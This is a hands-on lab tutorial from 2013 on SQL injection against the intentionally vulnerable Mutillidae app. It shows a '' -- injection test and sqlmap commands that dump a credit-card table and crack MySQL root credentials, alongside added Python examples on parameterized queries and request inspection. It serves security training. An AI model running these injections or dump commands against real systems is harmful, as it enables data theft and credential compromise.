
OWASP Top 10 Web Hacking Final Lab 12 - SQL Injection with sqlmap, tamper data & burpsuite

Written By Akademy on Thursday, November 21, 2013 | 9:15 PM


Navigate to "View Someones Blog"
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If the Firefox icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL (http://192.168.1.111/mutillidae) with your Mutillidae IP address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.1.111/mutillidae
  3. Go to View Someones Blog
    • Instructions:
      1. OWASP Top 10 --> A1 - SQL Injection --> SQLMAP Practice --> View Someones Blog

Section 8. Positive SQL Injection Test
  1. Activate Tamper Data
    • Instructions:
      1. Tools --> Tamper Data
  2. Start the Tamper
    • Instructions:
      1. Click on Start Tamper
  3. View Blog Entries
    • Instructions:
      1. Select "admin" from the drop down menu
      2. Click on the View Blog Entries
  4. Tamper with request?
    • Instructions:
      1. Click on the Tamper Button
  5. Modify Post Parameter Values
    • Instructions:
      1. Replace admin with '' --
        • Where there are two single quotes (').
        • Remember to put a space after the last hyphen (-).
      2. Click the OK Button
    • Note(FYI):
      1. The goal of submitting '' --  to the webpage form is to produce empty results without triggering an error.
      2. Some web administrators have automated alerts that are triggered from application and database log errors.
      3. So in this case, we now know a SQL injection is possible, without creating an error.
  6. Close Tamper Data
    • Instructions:
      1. Click the X to close Tamper Data
    • Note(FYI):
      1. We are closing Tamper Data, because we no longer need to tamper with any HTTP POST requests.
      2. Continue to Next Step.
  7. Viewing the Results
    • Note(FYI):
      1. Notice 0 records were returned.
      2. This test was positive, because it did not trigger any errors, but it did produce the column headers that would frame the results if any were returned.
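What the positive test in this section demonstrates, as an added Python example that is not part of the original lab and is not Mutillidae's source: a vulnerable string-concatenated query and a parameterized one both return zero rows and no error for the page's '' -- value, so an alert that watches only database errors stays silent in both cases. The difference is visible only in the generated SQL text and in the submitted value itself, which is why request-side inspection is needed. The table, its rows and the looks_like_sql_syntax rule are constructed for this example.

```python
import sqlite3
from urllib.parse import unquote_plus

# Constructed stand-in for Mutillidae's blog table; the real schema is not on the page.
SAMPLE_ROWS = [("admin", "first entry"), ("admin", "second entry"), ("john", "hello")]

# The page's own test value: two single quotes, a space, two hyphens, a trailing space.
PAGE_PAYLOAD = "'' -- "


def make_db():
    """Fresh in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE blogs_table (blog_author TEXT, blog_entry TEXT)")
    conn.executemany("INSERT INTO blogs_table VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def view_blog_concatenated(conn, author):
    """Vulnerable pattern (assumed, not Mutillidae's code): the POST value is
    glued into the SQL text, so the input becomes part of the statement."""
    sql = ("SELECT blog_author, blog_entry FROM blogs_table "
           "WHERE blog_author='" + author + "'")
    return sql, conn.execute(sql).fetchall()


def view_blog_parameterized(conn, author):
    """Hardened pattern: the SQL text never changes; the value is bound separately."""
    sql = "SELECT blog_author, blog_entry FROM blogs_table WHERE blog_author=?"
    return sql, conn.execute(sql, (author,)).fetchall()


def outcome(handler, author):
    """Run one request and report (generated SQL, row count, error text or None)."""
    conn = make_db()
    try:
        sql, rows = handler(conn, author)
        return sql, len(rows), None
    except sqlite3.Error as exc:          # this is all an error-based alert ever sees
        return None, 0, str(exc)
    finally:
        conn.close()


def looks_like_sql_syntax(value):
    """Request-side rule that needs no database error: an odd number of single
    quotes, or a quote together with a '--' comment marker. Names such as
    O'Brien trip the odd-quote half, so treat a hit as a triage signal."""
    quotes = value.count("'")
    return quotes % 2 == 1 or (quotes > 0 and "--" in value)


def flag_post_body(body):
    """Return the names of form fields whose decoded value trips the rule."""
    flagged = []
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        if looks_like_sql_syntax(unquote_plus(raw)):
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    for handler in (view_blog_concatenated, view_blog_parameterized):
        for author in ("admin", PAGE_PAYLOAD):
            sql, count, err = outcome(handler, author)
            print(f"{handler.__name__:24} {author!r:12} rows={count} error={err}")
            print(f"    {sql}")
    # Constructed POST body carrying the page's value, URL-encoded as a browser sends it.
    body = "author=%27%27+--+&view-someones-blog-php-submit-button=View+Blog+Entries"
    print("flagged fields:", flag_post_body(body))
```

Both handlers give the same visible result for both inputs (two rows for admin, zero rows and no error for the test value), which is exactly why the lab calls the test positive: the application produced no error to alert on. Only the concatenated handler's SQL text carries the submitted quotes and comment marker, and only the request body shows them to a reviewer.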

Section 12. Configure Firefox Proxy Settings
  1. View Preferences
    • Instructions:
      1. Edit --> Preferences
  2. Advanced Settings...
    • Instructions:
      1. Click on the Advanced Icon
      2. Click on the Network Tab
      3. Click on the Settings... button
  3. Connection Settings
    • Instructions:
      1. Click on Manual proxy configuration
      2. Type "127.0.0.1" in the HTTP Proxy Text Box
      3. Type "8080" in the Port Text Box
      4. Check Use the proxy server for all protocols
      5. Click OK
      6. Click Close

Section 13. Configure Burp Suite
  1. Start Burp Suite
    • Instructions:
      1. Applications --> BackTrack --> Vulnerability Assessment --> Web Application Assessment --> Web Application Proxies --> burpsuite
  2. JRE Message
    • Instructions:
      1. Click OK
  3. Configure proxy
    • Instructions:
      1. Click on the proxy tab
      2. Click on the options tab
      3. Verify the port is set to 8080

Section 12. Capture Post Parameters with Burpsuite
  1. View Blog Entries
    • Instructions:
      1. Select "admin" from the drop down menu
      2. Click on the View Blog Entries
  2. Copy Post Parameter
    • Instructions:
      1. Highlight all the text of the intercepted request shown by Burp Suite.
      2. Right click on the highlighted text.
        • This opens a context menu.
      3. Select Copy.
  3. Open gedit
    • Notes (FYI):
      • gedit is a UTF-8 compatible text editor for the GNOME desktop environment, Mac OS X and Microsoft Windows.
    • Instructions:
      1. gedit /pentest/database/sqlmap/burp.txt &
  4. Save File
    • Notes (FYI):
      • The Edit-->Paste feature does not work with text copied from burpsuite; therefore, press the <Ctrl> and v keys to paste.
    • Instructions:
      1. Press the <Ctrl> and v keys to paste.
      2. Click the Save button

Section 13. Using sqlmap against Mutillidae
  1. View Databases with sqlmap
    • Instructions:
      1. cd /pentest/database/sqlmap
      2. grep "Referer" burp.txt | awk '{print $2}'
      3. grep "author" burp.txt
      4. grep "Cookie" burp.txt | sed 's/Cookie: //'
      5. ./sqlmap.py -u "http://192.168.1.111/mutillidae/index.php?page=view-someones-blog.php" --data="author=admin&view-someones-blog-php-submit-button=View+Blog+Entries" --cookie="showhints=0; PHPSESSID=6lmbhjodbtnj6o5ajuli7p1s24" --dbs
        • Replace 192.168.1.111 with the Mutillidae IP address obtained from (Section 3, Step 3).
        • Replace the cookie string showhints=0; PHPSESSID=6lmbhjodbtnj6o5ajuli7p1s24 with the cookie string obtained from Step 4 above.
  2. View Database Results
    • Instructions:
      1. Do you want to keep testing the others? [y/N] N
      2. Notice the databases sqlmap returns.
  3. View nowasp database tables
    • Instructions:
      1. Press the UP ARROW to display the previous command
      2. ./sqlmap.py -u "http://192.168.1.111/mutillidae/index.php?page=view-someones-blog.php" --data="author=admin&view-someones-blog-php-submit-button=View+Blog+Entries" --cookie="showhints=0; PHPSESSID=6lmbhjodbtnj6o5ajuli7p1s24" -D nowasp --tables
    • Notes (FYI):
      1. -D nowasp --tables displays the tables in the nowasp database.
  4. View table results with sqlmap
    • Note(FYI):
      1. Notice the 11 nowasp tables
      2. Notice there is a credit card table.
  5. Retrieve credit_cards table contents
    • Instructions:
      1. Press the UP ARROW to display the previous command
      2. ./sqlmap.py -u "http://192.168.1.111/mutillidae/index.php?page=view-someones-blog.php" --data="author=admin&view-someones-blog-php-submit-button=View+Blog+Entries" --cookie="showhints=0; PHPSESSID=6lmbhjodbtnj6o5ajuli7p1s24" -D nowasp -T credit_cards --dump
    • Note(FYI):
      1. -D nowasp -T credit_cards --dump displays the contents of the credit_cards table.
  6. Review credit_cards table results
    • Instructions:
      1. Do you want to use dictionary attack ... [Y/n/q] n
      2. Notice the pretend credit card numbers.

Section 14. Using sqlmap -- Load HTTP request from a file
  1. View Databases with sqlmap
    • Instructions:
      1. ./sqlmap.py -r burp.txt --dbs
    • Note(FYI):
      1. -r, This option is very kool.  It allows you to use the burpsuite request file we saved in (Section 12, Step 4), instead of using the -u, --data, and --cookie options.
      2. --dbs, This option displays all the databases.
      3. I guess I could have shown you this option earlier, but good things come to those who wait.
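The -r option works because the saved burp.txt holds a complete raw HTTP request: request line, headers, a blank line, then the POST body. The added Python example below (not part of the original lab and not sqlmap's own code) parses a request in that layout and returns the same three pieces that the grep, awk and sed steps of Section 13 pulled out by hand: the URL, the cookie string and the POST data. The sample request is constructed from the page's values; the User-Agent and Content-Type headers are assumed filler. The same parser is what a defender would reach for when triaging a request captured by a proxy or WAF, to list which fields the client controlled.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample in the layout Burp Suite shows for an intercepted request.
# Request line, Host, Referer, Cookie and body use the page's values; the
# other headers are assumptions added to make the sample realistic.
SAMPLE_BODY = "author=admin&view-someones-blog-php-submit-button=View+Blog+Entries"
SAMPLE_REQUEST = (
    "POST /mutillidae/index.php?page=view-someones-blog.php HTTP/1.1\r\n"
    "Host: 192.168.1.111\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Referer: http://192.168.1.111/mutillidae/index.php?page=view-someones-blog.php\r\n"
    "Cookie: showhints=0; PHPSESSID=6lmbhjodbtnj6o5ajuli7p1s24\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(SAMPLE_BODY)}\r\n"
    "\r\n"
    + SAMPLE_BODY
)


def parse_raw_request(text, scheme="http"):
    """Split a raw HTTP request into the pieces sqlmap's -u, --data and --cookie
    options take. Accepts CRLF or bare LF line endings (editors often convert)."""
    text = text.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cookie = headers.get("cookie", "")
    # "name=value; name=value" -> dict; tolerate missing spaces after ';'
    cookies = dict(part.split("=", 1) for part in re.split(r";\s*", cookie) if "=" in part)
    return {
        "method": method,
        "url": f"{scheme}://{headers['host']}{target}",   # what -u takes
        "headers": headers,
        "cookie": cookie,                                  # what --cookie takes
        "cookies": cookies,
        "body": body,                                      # what --data takes
        "params": parse_qs(body, keep_blank_values=True),
    }


def user_controlled_fields(req):
    """Names of every value the client chose: form fields plus query-string keys."""
    query = urlsplit(req["url"]).query
    return sorted(set(req["params"]) | set(parse_qs(query, keep_blank_values=True)))


if __name__ == "__main__":
    req = parse_raw_request(SAMPLE_REQUEST)
    print("URL:      ", req["url"])
    print("Cookie:   ", req["cookie"])
    print("POST data:", req["body"])
    print("Client-controlled fields:", user_controlled_fields(req))
```

Run against the constructed request, the three printed values match the -u, --cookie and --data arguments typed in Section 13, Step 1, and the field list shows that page, author and the submit button value are all client-supplied input the application must treat as untrusted.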
  2. View Databases results
    • Note(FYI):
      1. Notice that all the databases are displayed similar to (Section 13, Step 2).
      2. The mysql database contains important internal tables including usernames and passwords.
  3. View tables with sqlmap
    • Instructions:
      1. ./sqlmap.py -r burp.txt -D mysql --tables
    • Note(FYI):
      1. -D mysql --tables displays the tables in the mysql database.
  4. View tables results
    • Note(FYI):
      1. Notice all the tables for the mysql database are displayed.
      2. The user table holds the MySQL server's account usernames and password hashes, which is why sqlmap offers a dictionary attack on them below.
  5. View user table contents with sqlmap
    • Instructions:
      1. ./sqlmap.py -r burp.txt -D mysql -T user --dump
    • Note(FYI):
      1. -D mysql -T user --dump displays the contents of the user table in the mysql database.
  6. View user table password
    • Instructions:
      1. Do you want to use dictionary attack ... [Y/n/q] Y
      2. What's the dictionary location? <Press Enter>
      3. Do you want to use common password suffixes? [y/N] N
      4. Notice the user is 'root' and the password is 'samurai'

Section 15. Proof of Lab
  1. Proof of Lab: record the entire practice procedure, together with a text note bearing your name.